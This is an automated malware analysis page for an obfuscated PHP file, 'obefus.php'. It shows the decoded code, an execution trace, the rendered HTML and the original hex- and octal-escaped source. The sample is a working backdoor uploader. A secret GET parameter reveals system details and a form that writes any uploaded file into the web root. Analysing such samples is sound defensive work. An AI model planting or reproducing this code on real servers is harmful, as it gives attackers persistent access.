obefus.php

md5: dee3a8f432025dc2ade9f83ac9877c49

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Environment
php_uname (Deobfuscated, Original)

Files
copy (Deobfuscated, Original)

Input
_FILES (Deobfuscated, Original)
_GET (Deobfuscated, Original)
_POST (Deobfuscated, Original)

Deobfuscated PHP code
<?php

$waf = "4R";
if (isset($_GET["4R"])) {
    echo "haloo " . htmlspecialchars($waf) . "!, kemana aja kamu sayang wkwkawoawkoa";
    echo "<br />";
    echo "<b>" . php_uname() . "</b><br>";
    echo "<form method='post' enctype='multipart/form-data'>\n\t  <input type='file' name='idx_file'>\n\t  <input type='submit' name='upload' value='upload'>\n\t  </form>";
    $root = $_SERVER["DOCUMENT_ROOT"];
    $files = $_FILES["idx_file"]["name"];
    $dest = $root . "/" . $files;
    if (isset($_POST["upload"])) {
        if (is_writable($root)) {
            if (@copy($_FILES["idx_file"]["tmp_name"], $dest)) {
                $web = "http://" . $_SERVER["HTTP_HOST"] . "/";
                echo "Sukses Upload -> <a href='{$web}{$files}' target='_blank'><b><u>{$web}{$files}</u></b></a>";
            } else {
                echo "Gagal Upload.";
            }
        } else {
            if (@copy($_FILES["idx_file"]["tmp_name"], $files)) {
                echo "Sukses Upload <b>{$files}</b> di Folder ini";
            } else {
                echo "Gagal Upload";
            }
        }
    }
} else {
    echo "MAU NGAPAIN LO " . htmlspecialchars(array_keys($_GET)[0]) . " ? >:(";
}
Execution traces
data/traces/dee3a8f432025dc2ade9f83ac9877c49_trace-1676244838.9808.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:34:24.878592]
1	0	1	0.000187	393528
1	3	0	0.000294	401736	{main}	1		/var/www/html/uploads/obefus.php	0	0
1		A						/var/www/html/uploads/obefus.php	2	$waf = '4R'
2	4	0	0.000327	401736	array_keys	0		/var/www/html/uploads/obefus.php	2	1	[]
2	4	1	0.000342	401768
2	4	R			[]
2	5	0	0.000375	401736	htmlspecialchars	0		/var/www/html/uploads/obefus.php	2	1	NULL
2	5	1	0.000391	401928
2	5	R			''
1	3	1	0.000405	401736
			0.000431	314304
TRACE END   [2023-02-12 21:34:24.878874]

Generated HTML code
<html><head></head><body>MAU NGAPAIN LO  ? &gt;:(</body></html>
Original PHP code
<?php
 $waf = "\64\x52"; if (isset($_GET["{$waf}"])) { echo "\x68\141\154\157\x6f\x20" . htmlspecialchars($waf) . "\41\x2c\40\x6b\145\155\x61\156\141\x20\x61\152\x61\40\153\141\x6d\165\40\x73\x61\x79\x61\156\x67\40\167\153\167\x6b\x61\167\157\141\x77\x6b\157\x61"; echo "\x3c\142\162\40\x2f\x3e"; echo "\x3c\142\76" . php_uname() . "\74\x2f\142\x3e\74\x62\x72\76"; echo "\74\146\x6f\x72\x6d\40\155\x65\164\x68\157\x64\75\47\x70\157\163\x74\47\40\x65\156\x63\164\x79\x70\x65\75\x27\155\x75\x6c\x74\151\160\141\x72\164\57\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x27\x3e\xa\11\40\40\74\x69\156\x70\x75\x74\x20\x74\171\160\x65\75\x27\x66\151\154\145\x27\x20\156\x61\155\145\75\47\x69\144\x78\137\x66\151\154\x65\x27\76\xa\11\x20\40\x3c\x69\156\160\x75\x74\x20\x74\x79\160\x65\75\47\163\x75\142\155\x69\164\x27\40\x6e\x61\155\145\x3d\x27\165\160\154\x6f\x61\144\47\40\166\141\154\165\x65\x3d\47\x75\x70\154\x6f\x61\144\47\x3e\12\x9\x20\x20\74\x2f\x66\x6f\162\x6d\x3e"; $root = $_SERVER["\x44\117\103\125\115\105\116\124\x5f\x52\x4f\x4f\124"]; $files = $_FILES["\x69\x64\170\137\146\x69\x6c\x65"]["\x6e\141\x6d\x65"]; $dest = $root . "\x2f" . $files; if (isset($_POST["\165\x70\154\x6f\141\144"])) { if (is_writable($root)) { if (@copy($_FILES["\151\144\x78\x5f\146\151\x6c\x65"]["\164\x6d\x70\137\156\x61\x6d\145"], $dest)) { $web = "\150\x74\x74\x70\72\x2f\57" . $_SERVER["\110\x54\124\120\137\x48\117\x53\x54"] . "\57"; echo "\123\x75\153\163\145\163\x20\125\160\154\157\x61\x64\x20\x2d\76\x20\x3c\141\x20\150\162\x65\x66\75\47{$web}{$files}\47\x20\x74\x61\162\147\x65\164\x3d\x27\x5f\x62\x6c\141\x6e\153\47\x3e\x3c\142\76\74\165\x3e{$web}{$files}\74\x2f\x75\x3e\74\57\x62\x3e\74\x2f\141\x3e"; } else { echo "\x47\x61\147\x61\x6c\x20\125\x70\154\157\x61\144\x2e"; } } else { if (@copy($_FILES["\151\144\x78\137\x66\151\x6c\145"]["\164\155\160\137\156\141\155\145"], $files)) { echo "\123\165\x6b\x73\145\x73\40\x55\160\154\157\141\x64\40\x3c\x62\x3e{$files}\74\x2f\142\76\x20\144\151\x20\106\157\x6c\144\x65\x72\x20\151\156\x69"; } else { echo "\107\x61\147\x61\154\40\125\x70\x6c\157\141\x64"; } } } } else { echo "\x4d\101\x55\x20\116\107\x41\x50\x41\111\116\x20\114\x4f\40" . htmlspecialchars(array_keys($_GET)[0]) . "\x20\77\x20\76\x3a\50"; }
PHP Malware Analysis

obefus.php

md5: dee3a8f432025dc2ade9f83ac9877c49

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
